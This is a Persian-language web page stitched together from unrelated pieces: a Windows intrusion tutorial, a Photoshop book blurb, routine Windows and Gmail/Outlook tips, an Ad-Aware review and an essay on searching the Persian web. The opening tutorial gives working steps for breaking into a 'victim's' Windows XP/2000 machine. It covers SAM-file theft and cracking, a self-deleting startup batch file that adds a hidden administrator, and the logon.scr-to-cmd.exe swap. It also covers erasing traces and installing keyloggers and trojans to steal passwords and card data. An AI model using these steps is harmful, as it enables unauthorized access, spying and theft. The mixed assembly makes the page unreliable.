برای این کار چند روش وجود دارد :
روش اول :
در جایی که از شما UserName , Password پرسیده می شود کلید های Alt+Ctrl+Del را دو مرتبه همزمان فشار دهید . در قسمت UserName کلمه Administrator را وارد کرده و جای کلمه عبور را خالی بگذارید و Enter بزنید تا وارد ویندوز شوید ...
این روش ساده است اما همیشه کارساز نیست اگر برای Administrator آن کلمه عبوری قرار داده شده باشد ؟!!
به سراغ روش دوم میرویم :
روش دوم :
1- ابتدا یک فلاپی Bootable می سازیم .
2- اغلب فایل سیستم ویندوز XP,2000 از نوع NTFS است و در محیط شبیه Dos که با فلاپی راه اندازی میشود شناخته نمی شود بنا براین ما برای این کار نیاز به برنامه هایی مثل NTFS4DOS ( دانلود : http://users.cjb.net/mojtaba/ntfs4dos.zip ) داریم.(این نوع برنامه ها امکان کار کردن با درایو هایی که فایل سیستم آنها Ntfs را در dos به ما می دهد.)
3- خوب پس از انجام مراحل فوق فلاپی را در فلاپی درایو قرار داده و سیستم را با آن راه اندازی می کنیم . و بر نامه NTFS4DOS را اجرا می کنیم تا به اطلاعات درایو های NTFS دسترسی داشته باشیم .
4- درایوی که ویندوز در آن نصب است را پیدا می کنیم و به مسیر زیر رفته :
%Windir%\System32\ConfigExample : c:\windows\system32\config
در این پوشه فایلی به نام * sam را در فلاپی کپی می کنیم.
( نکته : در ویندوز 2000 با پاک کردن این فایل دیگر کار تمام است و میتوان با Username: Administrator و بدون پسورد وارد شویم اما میتوان برای این که رد پایی باقی نماند از فایل Sam یک کپی داشته باشیم تا بعد از انجام کارمان در ویندوز با برگرداندن این فایل به جای قبلی آن رد پای خود را پاک کنیم و نام و پسورد کاربران به حالت قبل برگردد.)
از این مرحله به بعد برای Windows Xp بیشتر توصیه میشود :
5- بعد از کپی فایل با برنامه هایی نظیر L0phtCrack ,John the Ripper آن را کرک می کنیم تا پسورد را به دست آورد .
روش سوم :
در این روش چهار مرحله اول روش دوم را انجام میدهیم.
1- دستورات زیر را در Notepad می نویسیم و در فایلی با نام و پسوند test.bat ذخیره میکنیم :
echo off@
net user administrator 123 /add
net localgroup administrator administrators /add
net user administrator 123
del test.bat
echo on@
2- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپیوتر قربانی می رویم و فایلی که در مرحله قبل ساخته ایم را در مسیر زیر کپی می کنیم(به فرض که ویندوز در درایو C نصب باشد و کاربری با نام hassan مدیر سیستم باشد):
C:\Documents and Settings\hassan\Start Menu\Programs\Startup
3- خوب حالا فقط کافی است که منتظر بمانید تا کاربر hassan یک بار وارد شود دیگر تمام است و شما بعد از آن می توانید با نام کاربری Administrator و کلمه عبور 123 وارد سیستم شوید.
توضیح دستورات مربوط به فایلی که میسازیم :
در خط اول این دستور باعث مخفی شدن بقیه دستورات در حال اجرا از دید کاربر می شود.
در خط دوم ما یک کاربر بانام Administrator و کلمه عبور 123 می سازیم .(این عمل برای این صورت می گیرد که ممکن است نام Administrator را تغییر داده باشند).
در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.
در خط چهارم احتمال می دهیم که نام Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.
در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.
در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.
نکته : توجه کنید که به جای کاربر Administrator و کلمه عبور 123 هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .
روش چهارم :
استفاده از برنامه Windows XP / 2000 / NT Key است . نسخه آزمایشی این برنامه را می توانید دانلود کنید.
روش پنجم
تا مرحله 4 را انجام می دهیم حالا در Dos هستیم و دستورات را جلوی خط فرمان می نویسیم .
الف - ابتدا به درایوی می رویم که در آن ویندوز نصب شده است .برای مثال فرض کنیم در درایو C نصب باشد دستور زیر را اجرا می کنیم :
:c
ب - Windows/System32 میرویم .و در آنجا کارهای زیر را انجام می دهیم :
با دستور : cd windows/system32
پ - یک پوشه ایجاد می کنیم با دستور زیر :
md hack
ت - حالا دو فایل cmd.exe و logon.scr را به این پوشه کپی می کنیم تا یک نسخه پشتیبان از این فایل ها داشته باشیم با اجرای دستورات زیر :
copy cmd.exe hack
copy logon.scr hack
ث - حالا فایل logon.scr را پاک می کنیم :
del logon.scr
ج - حالا فایل cmd.exe را به logon.scr تغییر نام می دهیم :
ren cmd.exe logon.scr
حالا کافی است کامپیوتر را ریستارت کنید .
بعد از این که ویندوز بالا آمد ، اگر توجه کنید چند دقیقه که صبر کنید در حالت عادی Screen saver Logon.scr به اجرا در می آید اما با این دستکاری که ما کرده ایم Cmd.exe به اجرا در می آید حالا می توانید کاربر جدید ایجاد کنید و یا کلمه عبور را عوض کنید .
برای ایجاد حساب کاربری از دستور زیر استفاده می کنیم :
net user hassan 123 /add
این دستور یک حساب کاربری با نام hassan و کلمه عبور 123 ایجاد می کند.
برای این که این کاربر را مدیر(Administrator) قرار دهیم دستور زیر را انجام می دهیم :
net localgroup hassan administrators /add
حالا اگر یک حساب کاربری موجود باشد و بخواهیم پسورد اون رو عوض کنیم دستور زیر را انجام می دهیم :
net user Ali 123
این دستور بدون این که پسورد قبلی کاربر Ali را از ما بخواهد پسورد اون رو به 123 تغییر می دهد.
ضمنا بعد از ورود به سیستم فایل هایی که در پوشه hack کپی کرده ایم را به جای قبلی برگردانید و پوشه hack را پاک کنید تا ردی باقی نماند .
نتیجه :
حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .
اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و ...
دوم این که یک برنامه جاسوسی مثل XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و ... و وب سایت های که سر می زند و حتی کلماتی که چت می کند و ... را بدانید .
سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین ...
چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .
توصیه های مهم :
1- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .
2- حداقل کاری که میتونین انجام بدین این است که سیستم شما با CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید.
3- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.
4- LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید.
5- نام کاربری Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .
6- اگر به کاربر Guest نیازی ندارید آن را غیر فعال کنید .
7- هر چند وقت یکبار پسورد خود را عوض کنید.
8- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید.

Book Description
Scott Kelby and Felix Nelson (the creative team behind Photoshop User magazine) take their best-selling Photoshop Killer Tips books to a whole new level with their update for Photoshop CS2.
Okay, why a book of nothing but tips? Because that's where all the really slick, really useful, and really fun stuff is. It's true! If we're looking through a book and we see the word "Tip" we're all immediately drawn to it, because we know we're about to learn something great. Maybe it's an undocumented keyboard shortcut, a hidden inside secret, or just a faster, better way to do something we do every day. The only problem with the tips in these books is that there are never enough of 'em. That is, until now.
That's because this book is packed cover-to-cover, wall-to-wall with nothing but those cool Photoshop CS2 sidebar tips. Every tip is designed to make you work faster, smarter, and have more fun using Photoshop CS2. There are no detailed descriptions of CMYK separation set-ups, or long boring discussions on color management theory. It's just tips--short, sweet, and to the point.
But we've done the "tip" idea one better, because every tip has a full-color graphic to make the tips even more accessible, even more fun, and even easier to use. Most importantly, to get in this book they've got to be "Killer Tips." The kind of tip that makes you smile, nod, and then call all your friends and "tune them up" with your new status as Photoshop guru.
If you've wondered how the pros get twice the work done in half the time, it's because they know all the tips, and all the tricks. Now with this book, so will you.
For more detail
اگر خواستید در زمانی که فیلمی را در ویندوز مدیا پلیر می بینید از صحنه ای عکس بگیرید با ترکیب دو کلید ctrl + I این کار را انجام دهید.
Backup گرفتن از آدرس ها و اطلاعات موجود در بخش Favorites:
اگر شما هم از كاربران پر و پا قرص اينترنت هستيد، به طور يقين ليست ارزشمندي از اسامي و آدرس سايت هاي مورد علاقه خود را در ستون Favorites نگه داري مي كنيد. بسياري از كاربران از اين مساله گلايه مند هستند كه با عوض كردن ويندوز و نصب يك ويندوز جديد، ليست سايت هاي مورد علاقه آنها در ستون Favorites از بين مي رود. در این قسمت چگونگي BackUp گرفتن از آدرس ها و اطلاعات موجود در اين ستون را آموزش دهيم. در ابتدا برنامه Internet Explorer خود را باز كنيد و از منوي File ، گزينه Import and Export … را انتخاب كنيد سپس بر روي Next كليك كنيد و از ليست موجود Export Favorites را انتخاب كرده و بر روي Next كليك كنيد. پس از مشاهده ليست آدرس سايت ها و تعيين محلي براي ذخيره شدن فايل BackUp ، بر روي Finish كليك كنيد. خب كار تمام است! هم اكنون شما از منوي Favorites خود يك نسخه پشتيبان در اختيار داريد. براي استفاده از اين نسخه پشتيبان در يك ويندوز جديد، در برنامه Internet Explorer از منوي File ، گزينه Import and Export … را انتخاب و سپس از ليست موجود Import Favorites را انتخاب كرده و بر روي Next كليك كنيد. سپس محل ذخيره فايل BackUp در سيستم خود را نيز وارد كنيد و كار را به پايان برسانيد. شما همچين مي توانيد اين نسخه بك آپ را كه يك فايل HTML است به كامپيوتر ديگري برده و در آنجا Import كنيد.غير فعال كردن گزارش خطا درWindows XP :
کنترل پنل خود را باز کنيد. سپس واردSystem شويد. بر روي زبانه Advanced کليک کنيد. سپس بر روي error-reporting در زير پنجره کليک کنيد.Disable error reporting را انتخاب کنيد و با فشار بر روی OK صفحات خارج شويد.
غير فعال كردن پخش اتوماتيك CD در :Windowx XP
My Computer را باز و بر روي CD Rom خود كليك كنيد. سپس
Properties را انتخاب كرده و بر روي Auto Play كليك نماييد.
در Drop Down Box مي توانيد فعال يا غير فعال بودن اين ويژگي
را معلوم كنيد.
غير فعال كردن Shared Document در:Windowx XP
وارد ريجستري شويد. حال به قسمت زير برويد :
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/Curren
tVersion/Explorer/MyComputer/NameSpace/DelegateFolders
حالا {59031a47-3f7-2 44a7-89c5-5595fe6b30ee} را حذف کنيد.
منبع : پی سی ورلد
همان طور كه مي دانيد پوشه My Dcoments يكي از پوشه هايي مي باشد كه محل آن را خود ويندوز تعيين مي كند و محل آن روي درايوي كه سيستم عامل نصب مي شود قرار دارد.
در صورتي كه بخواهيم محل آن را بنا به دلايلي تغيير دهيم و يا آن را در درايو شبكه قرار دهيم بايد به ترتيب زير عمل كرد:
بهتر است قبل از شروع روي درايوي كه قصد داريد پوشه مذكور را قرار دهيد يك پوشه به همان نام My documents ايجاد نمائيد.
1. روي پوشه My documents راست كليك كرده و گزينه Properties را انتخاب كنيد.
2. روي دكمه Move.. كليك كنيد.

3. در پنجره Selsct a Destination درايو مورد نظر و همچنين پوشه اي كه قبلا ايجاد كرده ايد را انتخاب نمائيد.
4.در انتها OK كنيد.
برگرفته از سايت iritn
لازم به ذکر است برای نصب هردو ، یاهو مسنجر لازم میباشد
Yahoo! Messenger Persian Tools
Would you like to read news headline in your messenger? So download Khabar Messenger (478 KB). Whit this plug-in, News headline of KHABAR E JONOOB newspaper will be show in your yahoo messenger.
Do you have any problem with English version of Yahoo Messenger? Let's download (3.10 MB) a Persian version. This program designed and programmed by Shetab Company. All of menus and panels, designed in Persian. Read more info here.
You need Yahoo! Messenger for install both
Outlook express نرم افزاری است که همواره به همراه ویندوز روی سیستم شما نصب میشود ، اما کاربرد این نرم افزار چیست ؟ در این کوتاه مقاله سعی می کنیم در مورد این برنامه بیشتر بدانیم .
اوتلوک در حقیقت یک ایمیل خوان است ، کافی است که شما تنها یوزر و پاسورد ایمیلتان را به نرم افزار دهید ، تا در هنگام اتصال به اینترنت ایمیل هایتان را چک کند و نامه هایی که نوشته اید را ارسال کند . آنهم بدون نیاز به باز کردن صفحه وب
این نرم افزار یک پیش شرط نیز دارد و آن اینکه سرویس دهنده ایمیل شما باید سرویس POP3 را برای ایمیتان فعال کرده باشد ،خوشبختانه جی میل از POP3 پشتیبانی می کند و کاربران آن می توانند تنها با چند تنظیم ساده جی میل هایشان را از طریق Outlook چک کنند
و اما نحوه تنظیم Outlook برای سازگاری با جی میل :
+ ابتدا وارد حسابتان در جی میل شوید
+ از طریق منوی بالا سمت راست وارد بخش Setting شوید
+ در این صفحه گزینه Forwarding and POP را انتخاب کنید
+ در قسمت POP Download گزینه Enable POP for all mail را انتخاب کنید
+ پس از اعمال تغییرات بالا گزینه Save را انتخاب کنید
اکنون می توانید از حساب جی میلتان خارج شوید ، تنظیمات مربوط به Outlook نیز به این شرح است :
+ پس از اجرای برنامه از منوی Tool گزینه Accounts را انتخاب کنید
+ در پنجره ای که باز میشود گزینه Add و سپس Mail را انتخاب کنید
+ در بخش Display Name یک نام برای خود انتخاب کرده ، به صفحه بعدی بروید
+ در این پنجره آدرس کامل جی میل خودتان را وارد کنید سپس به پنجره بعدی بروید
+ در کادر مربوط به incoming mail این پنجره بنویسید pop.gmail.com و در کادر outging mail نیز بنویسید smtp.gmail.com ، اکنون می توانید به پنجره بعدی بروید
+ در این پنجره نام کاربری و کلمه عبور جی میلتان را وارد کنید ( نام کاربری به طور خودکار اضافه شده است )
+ روی Finish کلیک کنید
+ در همان پنجره Internet Accounts که قبلا باز کرده بودید گزینه pop.gmail.com را انتخاب کرده ، سپس Prpperties را انتخاب کنید
+ در پنجره جدیدی که باز می شود از میان tab های بالا Advanced را انتخاب کنید
+ مقابل دو گزینه This server requires a secure connection چک مارک بزنید ( هر دو گزینه حتما )
+ مقدار عددی outgoing mail را به 465 تغییر دهید
+ مقدار عددی Incoming mail را 995 قرار دهید
+ اکنون از میان tab ها بالای پنجره Servers را انتخاب کرده ، سپس در این بخش مقابل My server requies authentication چک مارک بزنید و در پایان OK را انتخاب کنید
به همین راحتی کار تمام می شود ، تنها کافیست به محض اینکه به اینترنت متصل شدید برنامه را اجرا کرده گزینه Send / Recive را انتخاب کنید تا نمونه کار این نرم افزار را ببینید
حتما تا حالا مطالبی در مورد Spy شنیدید و خوندید.من در این مقاله سعی میکنم تا یه معرفی کلی از Spy داشته باشم و بعد هم شما رو با بهترین نرم افزار ضد جاسوسی آشنا میکنم.با رشد روزافزون اینترنت و مزایای استفاده از آن متاسفانه یکسری برنامه های مخرب هم پیدا شدن که یکی از اونها برنامه جاسوسی هستند.وقتی شما در حال گشت گذار در اینترنت هستین برنامه هایی در پشت زمینه کار میکنن که علاوه بر کم کردن سرعت شما ، اطلاعات مهم شما رو برای نویسندگانشون ارسال می کنند.این برنامه ها اکثرا توسط مرورگر ضعیف و شکننده IE وارد سیستم میشن ( آخ که هرچی میکشیم از دست این IE میکشیم ) و البته لازم به گفتنه که برنامه های معروف هم با کمال پررویی این کار رو میکنن ، از جمله برنامه های مدیریت دانلود Get Right و Free Download Manager و برنامه های شرکت Adobe.البته راههای دیگری هم هست که لازم به گفتن نیست.ولی همیشه در مقابل برنامه های مضر ، برنامه های ضد اونها هم پدید میان که Spy از این قاعده مستثنی نبوده و شرکتهای بزرگ برنامه نویسی برنامه های خوبی برای پاک کردن Spy طراحی کردن که بهترین برنامه رو خدمتتون معرفی میکنم
Ad-Aware که جدیدترین نسخه اون Ad-Awre SE Personal 1.06 هست . این برنامه محصول شرکت سوئدی Lavasoft هست.در مورد قدرتش اینطور بگم که بنده حدود یک ساله هر چی به سایت Download.com سر میزنم ، این برنامه بیشترین تعداد دانلود رو در سایت داره و تا حالا حدود 1,147,138 بار از این سایت دانلود شده.برای تست کردنش کافیه چند دقیقه با IE وبگردی کنید و بعد بزارین که برنامه یه اسکن کوچولو کنه.بعد از اسکن میبینید که لیست بالا بلندی خدمتتون عرض میکنه.از خصوصیات این برنامه اینه که فایلهای مشکوک رو هم شناسایی میکنه و تحت عنوان Negligible (بی اهمیت) خدمتتون معرفی میکنه.لازم به گفتنه موقعی که از فایرفاکس استفاده میکنم این برنامه فقط Negligible ها رو پیدا میکنه (واقعا که مرورگر خوبیه).این برنامه کاردرست (مثل نویسندگانش) فایلهایی رو که به جرات میشه گفت نرم افزارهای ضد ویروس از جمله نورتون و مک آفی باهاشون تعارف دارن رو شناسایی میکنه (بنده شخصا هردوی این نرم افزارهای ضد ویروسی رو امتحان کردم و به گفته ام اطمینان کامل دارم ).این برنامه هر دو هفته یک بار تقاضای آپدیت میکنه که بهتره بزارین آپدیت بشه البته راه آپدیت دستی رو هم داره.در ضمن سرعت آپدیت خوبی هم داره (در حد یکی دو دقیقه). نکته:بعد از آپدیت یه کپی از فایل defs.ref بگیرین تا اگه برنامه پاک شد یا ویندوز خراب شد و مجبور به نصب دوباره بودین ، با Past کردن فایل در محل نصب ؛ برنامه طبق آخرین آپدیت کار کنه.پیشنهاد من اینه که این برنامه رو تهیه کنید تا از نزدیک محو قدرت نمایی اون بشین
دانلود برنامه اندازه : 2.72 MB
سایت اصلی : Lavasoft.com سایت پشتیبانی : Lavasoftsupport.com
سایت خبرگزاری : Lavasoftnews.com سایت راهنمای آنلاین : Lavasofthelp.com
اينترنت به عنوان يك محمل اطلاعاتي عظيم، منابع اطلاعاتي را در مقياسي وسيع در دسترس مخاطبان بالقوه قرار داده است. سهولت دسترسي به منابع اطلاعاتي اعم از متن و ساير رسانهها عمدهترين مزيت اينترنت محسوب ميشود. اين توانايي كه هر كس ناشر آثار خود باشد عواقب ناخواستهاي را نيز در پي خواهد داشت و آشكارترين معضل، آن است كه انبوهي از منابع بسيار متنوع و غيرقابل مديريت را فراهم ميآورد. افزايش سريع منابع اينترنتي نيازمند يك سازماندهي مفيد و مؤثر است. هرچند در حال حاضر راهنمايهايي براي منابع اينترنتي تهيه شده است كه براساس فايلهاي مقلوب ساخته شدهِ توسط موتورهاي جستجو و با استفاده از قابليتهاي مختلف اين موتورها از جمله؛ استفاده از عملگرهاي بولي، جستجوي دقيق عبارت، محدود كردن يك جستجو به بخش خاصي از ركورد (مانند عنوان، آدرس) كوتاهسازي كلمات، جستجوي نزديكيابي واژهها، ايجاد محدوديت زماني و منطقهاي و زباني و .... به جستجوي اطلاعات كمك ميكند اما بايد تاكيد كرد كه در امر بازيابي اطلاعات از اينترنت بدون نمايهسازي نظام يافته نميتوان انتظار بازيابي مفيد و مؤثر را داشت. هرچند بيشترين اطلاعات موجود بر روي اينترنت به زبان انگليسي است، ولي حجم اطلاعات به زبان فارسي نيز با سرعت در حال افزايش است و كاربران به دلايل مختلفي علاقه زيادي به اطلاعات فارسي نشان ميدهند و از آن جايي كه زبان غالب در اينترنت انگليسي است، جستجو به زبانهاي غيرانگليسي از جمله فارسي، مسايل و مشكلات مختلفي را جداي از مشكلات عمومي اينترنت دارد.
حجم اطلاعات به زبان فارسي در روي اينترنت در اشكال مختلف آن به سرعت رشد كرده است. در حال حاضر توسعه وبلاگهاي فارسي، سايتهاي علمي، تبليغاتي و دانشگاهي به زبان فارسي باعث شده است كه جايگاه زبان فارسي تا حد زبان اول ارتباطات اينترنتي نزد ايرانيان و فارسيزبانان در سراسر جهان ارتقا يابد. شايد بتوان گفت كه اولين مرجع وبلاگنويسي فارسي با انتشار راهنماي ساخت وبلاگ فارسي آغاز شده است. بدون شك دومين موج نيز با شروع به كار سايت پرشين بلاگ كه امكان راهاندازي وبلاگ براي كاربران فارسي زبان را با سهولت بيشتري فراهم ميكند آغاز شده است. اما پيامد قابل توجه ديگري كه رشد وبلاگنويسي در ايران داشته است پيدايش سايتهاي اينترنتي فارسي زباني است كه صاحبان وبلاگها ايجاد كردهاند و اين خود موج جديدي از گسترش كاربرد اينترنت در جامعه ايران به حساب ميآيد. اكنون روي آوردن برخي از روزنامهنگاران، پژوهشگران، دانشجويان به وب فارسي و استفاده از منابع خبري، علمي و .... موجب تقويت نقش رسانهاي وب فارسي شده است.
پديده ديگري كه باعث گسترش زبان و خط فارسي در اينترنت شده است، ايجاد كتابخانههاي ديجيتالي فارسي در شبكه جهاني است. با اين كه از شكلگيري كتابخانههاي فارسي در شبكه جهاني مدت زيادي نميگذرد، اما با اين حال به سرعت در حال رشد و گسترش است. شماري از اين كتابخانهها در پايگاههاي اينترنتي شكل گرفتهاند و بسياري وبلاگهايي هستند كه براي اين كار راهاندازي شدهاند. از ويژگيهاي اين كتابخانهها اين است كه هيچ يك جنبه تجاري ندارند. آنچه در بسياري از كتابخانههاي مجازي فارسي در دسترس است تنها شامل كتاب نيست، بلكه نوشتههايي اعم از داستان، مقاله، تك نگاشت و .... نيز در ميان مجموعهها ديده ميشود. هم چنين آثاري كه احتمالاً هيچ گاه چاپ كاغذي ندارند و البته وجود كتابهايي كه مدتهاست ناياب هستند و مجال انتشار دوباره نيافتهاند و يا آثاري كه امروز به دلايلي بازچاپ آنها مقدور نيست، از جاذبههاي كتابخانههاي مجازياند. پايگاه اينترنتي كتابهاي رايگان فارسي، پايگاه اينترنتي باني تك، كتابخانه مجازي داستانهاي فارسي، آواي آزاد، پايگاه اينترنتي خوابگرد، كتابخانه دوات، پايگاه اينترنتي سخن، وبلاگ كتابخانه هرمس، پايگاه اينترنتي گفتمان، پايگاه تاريخ و فرهنگ ايران زمين، پايگاه مركز جهاني اطلاعرساني آل البيت، كتابخانه پايگاه اينترنتي حوزه، پايگاه اينترنتي امام علي (ع)، پايگاه اينترنتي كتابخانه ديجيتال و .... شماري از اين كتابخانهها هستند.
كاربران به دلايل مختلفي از قبيل «دسترسي آسان و ارزان به حجم عظيم اطلاعات، عدم نياز اطلاعات يافته شده از اينترنت به تايپ مجدد، دسترسي سريع و اطلاعات جديد، صرفهجويي در وقت و عدم تسلط اكثر كاربران به زبان انگليسي كه زبان غالب بر اينترنت است» به دنبال اطلاعات فارسي از اينترنت هستند. گسترش زبان و انبوهي از نوشتارها ايجاب ميكند كه خط ضابطه داشته باشد و از سوي ديگر پيشرفت فنآوري و پيدايش اينترنت خواستار ضابطه و قانونمندي است. اطلاعرساني كه جنبه بينالملي پيدا كرده است بدون دستورِ خطي سامان يافته و نظاممند ميسر نيست و دستكم بر دشواريها ميآفريند. در حال حاضر وبلاگهاي فارسي مقام دوم يا سوم را در جهان دارا ميباشد. به نظر دكتر آشوري، اگر زبان فارسي به همين صورت بيدقت در اينترنت به كار رود در سطح زباني براي تفنن باقي خواهد ماند و كمتر حرفي جدي به اين زبان زده خواهد شد. آينده زبان فارسي در اينترنت بستگي به اين دارد كه نويسندگان فارسي تا چه حد كار خود را جدي بگيرند و اين زبان را بازسازي كنند كه از لحاظ قدرت بيان و دقت مفاهيم و استواري ساختار دستوري به زبان انگليسي نزديك شود.
نبود استاندارد ثابت رسمالخط فارسي موجب اين شده است كه به تعداد صفحات وب فارسي سبك و سياق نگارش به كار رفته باشد، لذا ميتوان چنين ارزيابي كرد كه اكثر وبهاي فارسي در برخي خصوصيات مشترك ميباشند از جمله اين كه نگارش برخي از آنها زبان غيررسمي و محاورهاي است و به خصوص در متون علمي اغلب واژههاي بيگانه به دفعات استفاده ميشود. رسمالخط مورد استفاده نيز متفاوت و سليقهاي است و برخي از آنها غلطهاي تايپي و نگارشي فراواني دارند و اين خصوصيات، اغلب به جهت محدوديتهاي محيط الكترونيكي و عدم تطابق رسمالخط فارسي با آن ميباشد كه نمايهسازي و سپس جستجو به اين زبان را با دشواريهايي رو به رو ميسازد.
با توجه به اين نكته كه اطلاعات ارزشمند فراواني در اينترنت وجود دارد و اينترنت با شتابي فراوان به يك منبع اطلاعاتي ممتاز تبديل شده است. موتورهاي جستجو به عنوان يكي از اساسيترين دروازههاي ورود به منابع اينترنتي داراي ضعفهايي هستند كه ميتوان به اين موارد اشاره كرد:
- در يك مجموعه از يافتههاي بازيابي شده مدخلهاي تكراري فراواني ملاحظه ميشود.
- نتايج غير قابل پيشبيني هستند.
- نتايج چه بسا گمراه كننده باشند؛ ممكن است جستجويي در يك موتور كاوش نتيجهاي نداشته، ولي در موتور ديگر داراي يافتههاي فراوان باشد.
- موتورهاي كاوش محتويات پايگاههاي اطلاعاتي خودشان را نشان نميدهند و از معيارهايي كه براي گنجاندن يك مدرك در فايلهايشان دارند حتي شرحي ارايه نميكنند.
- مهار واژگاني وجود ندارد و قواعد نقطهگذاري و بزرگنويسي نيز استاندارد نيست.
- بدون بررسي عملي هر عنصر، اغلب نميتوان ميزان ربط و رابطهها را تحليل كرد. يعني اطلاعات كافي در مدخل نمايه نيست تا فرد بتواند دست به انتخاب بزند.
- عدم توان موتورهاي جستجو در تمايز ميان مداركي كه توسط فرد الف نوشته شده و مداركي كه درباره فرد الف نوشته شده است.
- منابع قابل توجهي در شبكه وب وجود دارند كه توسط موتورهاي جستجو نمايه نميشوند. به اين بخش از وب اصطلاحاً وب نامريي ميگويند. «وب نامريي بخش بزرگي از وب است كه موتورهاي جستجو آنها را نميتوانند نمايه كنند و عبارتند از: سايتهاي داراي رمز عبور، فايلهاي پي.دي.اف از متون آرشيو شده، ابزارهاي تعاملي نظير ماشين حسابها و برخي از واژهنامهها و همچنين بعضي از پايگاههاي اطلاعاتي، منابع محافظت شده از طريق اسم كاربر و گذر واژه، منابع و صفحات وب بدون پيوند و صفحات افزون بر حداكثر تعداد صفحات قابل مرور.»
جستجوي اطلاعات در اينترنت به دو روش ميتواند صورت گيرد يكي استفاده از جملات زبان محاورهاي است و ديگري بكارگيري كلمات كليدي. در روش استفاده از جملات زبان محاورهاي كه اغلب به كاربران تازهكار پيشنهاد ميشود. يكي از عيبهاي بزرگ اين روش تعداد نتايج جستجوي زيادي است كه بازگردانده ميشود. به همين دليل اين روش توسط كاربران حرفهاي و حتي توسط همه، كمتر استفاده ميشود.
يكي از كاراترين و مقتدرترين روشهاي جستجوي اطلاعات در دنياي وب استفاده از واژههايي است كه اصطلاحاً كلمات كليدي ناميده ميشوند. اغلب كاربران حرفهاي و جستجوگران ورزيده دنياي اينترنت ميتوانند با طرح بهترين كلمات كليدي و بكار بستن قوانين تركيب آنها با هم براي نيازهاي اطلاعاتي خود پاسخي در خور بيابند. در اين روش توصيههاي زير براي انتخاب كلمات كليدي و نيز جستجوي دقيق و مفيد پيشنهاد ميشود كه بشرح ذيل است:
1- حتيالمقدور سعي شود كلمات كليدي از ميان اصطلاحات منحصر به فرد و اسامي خاص انتخاب شود.
2- حتيالمقدور از آوردن كلمات عمومي كه عناوين بسياري را در زير مجموعه خود شامل ميشوند، جداً خودداري كنيد.
3 – هميشه اسم شخص يا نام شي يا هر چيز ديگري را كه مد نظر داريد بهطور كامل وارد كنيد.
4 – دقت كنيد كه اگر موتور جستجو ميان حروف بزرگ و كوچك تفاوتي ميگذارد، اين مسأله را در طرح كلمات كليدي خود مدنظر داشته باشيد.
5 – در نظر داشته باشيد اگر نتيجه جستجو صفر بود به احتمال زياد ميتواند از يك اشتباه تايپي باشد.
6 – اگر املاي صحيح و كامل كلمهاي را نميدانيد از كاركتر جانشين كه اغلب * و يا ؟ است استفاده كنيد.
7 – اگر يك كلمه كليدي را براي طرح دقيق و تمام و كمال يك مورد جستجو كفايت نميكند، از تكنيكهاي جستجوي عبارتي، استفاده از اپراتورهاي جبر بولين (AND, OR, NOT) استفاده كنيد. جستجوي عبارتي يكي از مهمترين و قدرتمندترين امكانات جستجو در اغلب موتورهاي جستجو ميباشد و ميتوان يك عبارت يا جمله مشخص را به همان ترتيبي كه كلمات وارد شدهاند مورد جستجو قرار داد. براي اين روش جستجو عبارت مورد نظر را داخل گيومه"" بگذاريد.
8 - استفاده از عملگر AND : AND به مفهوم "و" براي محدود كردن دامنه جستجو از طريق تركيب كليد واژههاي مختلف به كار ميرود و براي تركيب كليدهاي جستجو زماني كه براي شما مهم است كه دو يا چند كلمه كليدي حتماً وجود داشته باشد و علامت آن در پايگاههاي مختلف به صورت استفاده از عبارت AND، استفاده از + ، انتخاب عبارت ALL THE WORD از منو، انتخاب عبارت (MATCH ON ALL WORDS AND) بهوسيله كليك كردن بر روي دكمههاي راديويي است.
9– استفاده از عملگر OR: اپراتور OR به مفهوم "يا" و برخلاف عملگر AND باعث گسترش دامنه جستجو و بازيابي اطلاعات بيشتر شده براي تركيب كليد واژههاي جستجو زماني كه انتظار داريد تنها يك، دو يا چند كلمه كليدي حضور داشته باشند و علامت آن استفاده از عبارت OR، نحوهي اجراي ساده و معمولي آن، انتخاب عبارت ANY OF THE WORDS از منو، انتخاب عبارت (MATCH ON ANY WORDS OR) با كليك بر روي دكمههاي راديويي ميباشد. يكي از كاربردهاي مهم اين عملگر پوشش مفاهيم يا اصطلاحات مترادف، مرتبط يا با املاهاي متفاوت است.
10 – استفاده از عملگر NOT: اپراتور NOT به مفهوم "نه" و يا به جز كه در اين صورت تمامي جوابهاي بازگشتي كه حاوي عبارت يا كلمه كليدي هستند حذف خواهند گرديد و براي اجراي آن تنها كافيست كه NOT را قبل از عبارت يا كلمه كليدي مورد نظرتان با يك فاصله بياوريد.
